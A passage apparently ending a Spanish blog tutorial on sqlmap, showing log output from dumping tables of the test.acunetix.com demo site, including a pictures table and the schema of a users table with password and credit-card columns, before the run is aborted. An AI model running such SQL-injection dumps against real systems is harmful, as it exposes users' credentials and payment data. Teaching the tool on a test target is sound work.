to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 1000 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin .\n | Walking | | 1 | 1 | ./pictures/3.jpg | 3 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 986 | Lorem ipsum dolor sit amet. Donec molestie.\nSed aliquam sem ut arcu. | The universe | +------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+ [16:57:49] [INFO] Table 'acuart.pictures' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix. com/dump/acuart/pictures.csv' [16:57:49] [INFO] fetching columns for table 'users' on database 'acuart' [16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': uname, varchar(100), pass, varchar(100), cc, varchar(100), address, mediumtext, email, varchar(100), name, varchar(100) , phone, varchar(100), cart, varchar(100) [16:57:49] [INFO] fetching entries for table 'users' on database 'acuart' [16:58:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request ^C [17:01:59] [ERROR] user aborted [*] shutting down at 17:01:59
Volvéis a tener en rojo la información extraída.
Hasta aquí un pequeño repaso de SQLMap 
Un saludo
